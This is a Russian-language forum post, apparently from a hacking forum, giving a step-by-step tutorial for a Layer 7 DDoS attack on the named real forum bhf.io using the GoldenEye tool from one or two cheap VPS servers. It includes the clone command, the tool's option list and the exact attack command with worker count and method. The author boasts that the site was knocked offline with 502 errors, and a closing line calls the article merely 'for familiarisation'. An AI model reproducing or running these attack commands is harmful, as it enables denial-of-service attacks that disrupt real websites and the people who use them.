Народ! Сегодня мы будем ддосить форум bhf.io, с помощи пары слабеньких серверов на linux.
Крайне успешно!
Для сегодняшней DDos-атаки, нам понадобиться софт GoldenEye. Ссылка Для просмотра ссылки Войди
Все действия далее я буду выполнять на Debian 9, 2хVPS(2cpu 2.2ghz, 8ram, HDD 25). На самом деле подойдет сервер на много слабее моих. Для BHF например достаточно 1 такого.
И так, по порядку:
1. Скачиваем на сервер(-а) GoldenEye: Для просмотра ссылки Войди
Bash:
# если не установлен git, выполняем команду apt install git
git clone https://github.com/jseidl/GoldenEye
2. После скачивания переходим в папку GoldenEye:
Bash:
cd ./GoldenEye
3. Запускаем GoldenEye для просмотра всех возможных ключей:
Bash:
python goldeneye.py
или
./goldeneye.py
Видим примерно следующее(Для вас перевел):
Код:
USAGE: ./goldeneye.py <url> [OPTIONS]
OPTIONS:
Flag Description Default
-u, --useragents Использовать файл с useragents (По умолчанию: Генерируются случайным образом)
-w, --workers Number of concurrent workers (По умолчанию: 50)
-s, --sockets Number of concurrent sockets (По умолчанию: 30)
-m, --method HTTP метод для атаки 'get' или 'post' или 'random' (По умолчанию: get)
-d, --debug Включает режим отладки(Полноценный лог атаки) (По умолчанию: False)
-n, --nosslcheck Не проверять SSL (По умолчанию: True)
4. Для того что б положить bhf.io нам потребуется: 140 воркеров ( Предел для моего сервера ), и метод атаки random.
Команда будет выглядеть следующим образом:
Bash:
./goldeneye.py 'https://bhf.io' -w 140 --method random
или
python goldeneye.py 'https://bhf.io' -w 140 --method random
5. Profit, после запуска web сервер сходит с ума и мы получаем 502(чаще всего) ошибку.
Сейчас я показал вам и описал DDos атаку с помощью скрипта GoldenEye, и применил его на практике на довольно крупном форуме.
Мы с вам увидели атаку D(D)os Layer 7, она направлена на отказ в обслуживании клиентов. То есть, мы атакуем веб-сайт до тех пор, пока у него не закончатся ресурсы.
Обычно если такую атаку прекратить то сайт сразу же "приходит в себя".
Обычно она проходит с тысячи взломанных устройств, но сегодня я показал как Ддосить буквально с 1 дешевого сервера.
Удачи вам! Статья естественно для ознакомления